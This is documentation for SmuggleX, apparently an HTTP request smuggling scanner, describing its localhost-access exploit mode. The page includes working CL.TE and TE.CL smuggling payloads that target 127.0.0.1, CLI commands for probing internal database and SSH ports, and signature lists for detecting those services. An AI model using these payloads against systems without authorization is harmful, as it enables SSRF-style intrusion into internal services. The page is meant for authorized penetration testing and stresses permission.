to navigate
    to select
    esc to close
    SmuggleX

    Exploiting

    Using detected vulnerabilities to test for SSRF-like attacks

    The --exploit localhost-access feature leverages detected HTTP Request Smuggling vulnerabilities to test for SSRF-like attacks by attempting to make the backend server access localhost (127.0.0.1) on various ports.

    Overview

    HTTP Request Smuggling vulnerabilities can be exploited to force the backend server to make requests to internal services. The localhost-access exploit automates this testing by:

    1. Using detected smuggling vulnerabilities (CL.TE or TE.CL)
    2. Crafting payloads that target localhost on specified ports
    3. Analyzing responses for indicators of successful access
    4. Reporting which services are accessible

    Basic Usage

    Automatic Port Testing

    After detecting a vulnerability, test common localhost services:

    smugglex https://target.com/ --exploit localhost-access

    Default ports tested: 22 (SSH), 80 (HTTP), 443 (HTTPS), 8080, 3306 (MySQL)

    Custom Ports

    Specify which ports to test:

    smugglex https://target.com/ --exploit localhost-access --exploit-ports 22,80,443

    Testing Database Services

    smugglex https://target.com/ --exploit localhost-access --exploit-ports 3306,5432,6379,27017

    This tests:

    • 3306: MySQL
    • 5432: PostgreSQL
    • 6379: Redis
    • 27017: MongoDB

    Advanced Usage

    Combined with Detection Options

    Test only specific vulnerability types before exploitation:

    # Only test CL.TE, then exploit
smugglex https://target.com/ -c cl-te --exploit localhost-access

# Quick scan, stop at first vuln, then exploit
smugglex https://target.com/ -1 --exploit localhost-access

    Verbose Mode

    See detailed HTTP requests and responses:

    smugglex https://target.com/ --exploit localhost-access --exploit-ports 80,443 -v

    Verbose output shows:

    • Detected vulnerability details
    • Generated localhost payloads
    • Request and response data
    • Detection indicators found

    With Custom Headers

    smugglex https://target.com/ \
  -H "Authorization: Bearer token" \
  --exploit localhost-access \
  --exploit-ports 80,8080

    How It Works

    Detection Phase

    1. SmuggleX runs standard vulnerability detection
    2. Identifies CL.TE or TE.CL vulnerabilities
    3. Extracts the working smuggling payload

    Exploitation Phase

    1. Generates localhost-targeting payloads for each port
    2. Sends smuggling payload followed by probe request
    3. Analyzes response for success indicators
    4. Reports successful accesses

    Payload Generation

    CL.TE Vulnerabilities

    For Content-Length and Transfer-Encoding discrepancies:

    POST / HTTP/1.1
Host: target.com
Connection: keep-alive
Content-Length: 85
Transfer-Encoding: chunked

0

GET / HTTP/1.1
Host: 127.0.0.1:80
Connection: close

    The backend processes the smuggled request to localhost.

    TE.CL Vulnerabilities

    For Transfer-Encoding and Content-Length discrepancies:

    POST / HTTP/1.1
Host: target.com
Connection: keep-alive
Content-Length: 4
Transfer-Encoding: chunked

1
X
0

GET / HTTP/1.1
Host: 127.0.0.1:80
Connection: close

    The remainder after Content-Length bytes gets processed as a new request.

    Detection Indicators

    The exploit identifies successful localhost access through multiple indicators:

    Status Code Changes

    • Normal: 200 OK
    • After smuggling: 502 Bad Gateway, 503 Service Unavailable, 504 Gateway Timeout

    Status changes indicate the backend attempted to reach the smuggled target.

    Service Signatures

    Port-specific signatures detected in responses:

    PortServiceSignatures
    22SSHSSH-2.0, SSH-1., OpenSSH
    80HTTPApache, nginx, Server:
    443HTTPSSSL handshake, TLS alert, certificate
    3306MySQLMySQL, MariaDB
    5432PostgreSQLPostgreSQL
    6379RedisRedis
    27017MongoDBMongoDB

    Error Messages

    Keywords indicating internal access attempts:

    • Connection refused
    • Connection reset
    • No route to host
    • Host is unreachable
    • Bad Gateway
    • Service Unavailable
    • upstream
    • backend
    • 127.0.0.1
    • localhost

    Timing Differences

    Significant timing changes (> 1 second) from baseline may indicate:

    • Connection attempts to closed ports
    • Slow internal services
    • Timeout conditions

    Output Format

    Successful Access

    === Localhost Access Exploit Results ===
Target: https://target.com/
Success Rate: 2/3

[+] Localhost Access Successful on port 22
  Reason: Found signature 'SSH-2.0' in response; Status code changed from 200 to 502
  Response Status: HTTP/1.1 502 Bad Gateway

[+] Localhost Access Successful on port 80
  Reason: Found error keyword 'Connection refused' in response body
  Response Status: HTTP/1.1 502 Bad Gateway

Failed Attempts:
[-] Port 443 - No indicators of localhost access detected

    No Access Detected

    === Localhost Access Exploit Results ===
Target: https://target.com/
Success Rate: 0/5

[-] No successful localhost access detected on any tested port

Failed Attempts:
[-] Port 22 - No indicators of localhost access detected
[-] Port 80 - No indicators of localhost access detected
[-] Port 443 - No indicators of localhost access detected
[-] Port 8080 - No indicators of localhost access detected
[-] Port 3306 - No indicators of localhost access detected

    Requirements

    1. Vulnerability Detected: A CL.TE or TE.CL vulnerability must be found first
    2. Exploit Option: --exploit localhost-access must be specified
    3. Network Access: Target server must be reachable
    4. Authorization: You must have permission to test the target

    Use Cases

    Internal Service Discovery

    Identify which internal services are running:

    smugglex https://target.com/ --exploit localhost-access --exploit-ports 22,80,443,3306,5432,6379

    Specific Service Testing

    Test if a specific service is accessible:

    # Test if Redis is running
smugglex https://target.com/ --exploit localhost-access --exploit-ports 6379

# Test if MySQL is accessible
smugglex https://target.com/ --exploit localhost-access --exploit-ports 3306

    SSRF Validation

    Confirm SSRF potential through smuggling:

    smugglex https://target.com/ \
  -c cl-te,te-cl \
  --exploit localhost-access \
  --exploit-ports 80,8080,8000 \
  -v

    Troubleshooting

    "exploit requested but no vulnerabilities found to exploit"

    Cause: No smuggling vulnerability was detected.

    Solutions:

    • Verify target is vulnerable with manual testing
    • Try increasing timeout: -t 20
    • Test specific vulnerability types: -c cl-te or -c te-cl
    • Check if target is behind a WAF

    No Successful Localhost Access Detected

    Possible Reasons:

    • Backend may not be vulnerable to SSRF via smuggling
    • Services on tested ports are not running
    • Backend has additional protections
    • Wrong vulnerability type detected

    Solutions:

    • Try different ports with --exploit-ports
    • Use verbose mode to see detailed responses: -v
    • Test with wider port range
    • Verify vulnerability with exported payloads

    Connection Timeouts

    Cause: Requests timing out before completion.

    Solutions:

    • Increase timeout: -t 30
    • Some services may be slow to respond
    • Check network conditions
    • Try smaller port sets

    Security and Ethics

    Important Warnings

    • Authorization Required: Only test systems you have explicit permission to test
    • Security Alerts: Localhost access testing may trigger security monitoring
    • Rate Limiting: Multiple connection attempts may be logged or blocked
    • Legal Compliance: Unauthorized testing may violate laws and regulations

    Responsible Use

    1. Obtain written authorization before testing
    2. Define scope clearly with stakeholders
    3. Test in appropriate environments (staging, not production)
    4. Document all findings responsibly
    5. Report vulnerabilities through proper channels

    Best Practices

    • Test during maintenance windows when possible
    • Use appropriate timeouts to avoid DoS
    • Monitor target for unusual behavior
    • Keep detailed logs of testing activities
    • Coordinate with security teams

    Examples

    Comprehensive Testing

    # Full detection and exploitation workflow
smugglex https://target.com/ \
  -v \
  -o results.json \
  --export-payloads ./payloads \
  --exploit localhost-access \
  --exploit-ports 22,80,443,3306,5432,6379,8080

    Quick Validation

    # Fast check for common services
smugglex https://target.com/ \
  -1 \
  --exploit localhost-access \
  --exploit-ports 80,443

    Database-Focused

    # Test only database ports
smugglex https://target.com/ \
  --exploit localhost-access \
  --exploit-ports 3306,5432,6379,27017,1433 \
  -v

    With Authentication

    # Test with authentication headers
smugglex https://target.com/ \
  -H "Authorization: Bearer token123" \
  -H "X-API-Key: key456" \
  --cookies \
  --exploit localhost-access \
  --exploit-ports 80,8080

    References